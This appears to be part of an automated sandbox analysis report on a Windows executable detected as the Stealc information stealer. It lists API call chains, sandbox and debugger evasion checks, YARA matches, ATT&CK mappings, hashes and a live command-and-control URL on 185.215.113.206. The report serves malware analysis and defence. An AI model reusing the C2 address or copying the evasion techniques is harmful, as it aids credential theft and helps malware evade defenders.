              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00453910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00453910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00451250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00451250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00451269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00451269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0045E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00454B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00454B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00454B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00454B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0045CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0044DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00452390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00452390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0044DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004523A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0045DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0045D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004416A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004416B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00461BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00461BF0
              Source: file.exe, file.exe, 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1745302032.00000000015B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
              Source: file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1745302032.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1745302032.00000000015E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25823
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25970
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25979
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25842
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00444A60 VirtualProtect 00000000,00000004,00000100,?0_2_00444A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00466390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00466390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00466390 mov eax, dword ptr fs:[00000030h]0_2_00466390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00462A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00462A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7148, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00464610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00464610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004646A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_004646A0
              Source: file.exe, file.exe, 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00462D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00462B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00462B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00462A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00462A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00462C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00462C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1701395564.0000000005180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7148, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1701395564.0000000005180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7148, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.phpy;100%Avira URL Cloudmalware
              http://185.215.113.206k0%Avira URL Cloudsafe
              http://185.215.113.206/c4becf79229cb002.php/i100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/G100%Avira URL Cloudmalware
              http://185.215.113.206/5zm$100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/G19%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high
                  185.215.113.206/c4becf79229cb002.phpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.php/ifile.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206kfile.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://185.215.113.206/c4becf79229cb002.php/Gfile.exe, 00000000.00000002.1745302032.00000000015C7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.phpy;file.exe, 00000000.00000002.1745302032.00000000015B4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://185.215.113.206/5zm$file.exe, 00000000.00000002.1745302032.000000000156E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.206
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1561643
                      Start date and time:2024-11-24 03:03:09 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 29s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:1
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 18
                      • Number of non-executed functions: 124
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.206file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousAmadeyBrowse
                      • 185.215.113.43
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousAmadeyBrowse
                      • 185.215.113.43
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.945145795707113
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'798'656 bytes
                      MD5:3feea8ff886f1fc0d57da4a2b3a109ba
                      SHA1:78d6302f4f09726b6a129c5fcc7cd94a474cc53a
                      SHA256:143e6525646d5d95639eb77420a54205cb02fb8624c6e1662b7460f58b03523f
                      SHA512:e5c107f29e9b2c58365df6e7cb3d7c38534e931147c92ade485f949751712ae63a375608b9cacb178593f5b25b58ebb5980b8abef3df459ea6e15d2b6f709e32
                      SSDEEP:49152:SY1ySnSCeX+CHrw9LBDb4t+oxXLrtXzc:SY11nSPX+aMJb0+o93e
                      TLSH:4F8533B99F041534E6BD64F9CB23B683948CF505C7F1F7EE5822B22C0DA76B414A43A9
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0xa94000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007FE8A0BB466Ah

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
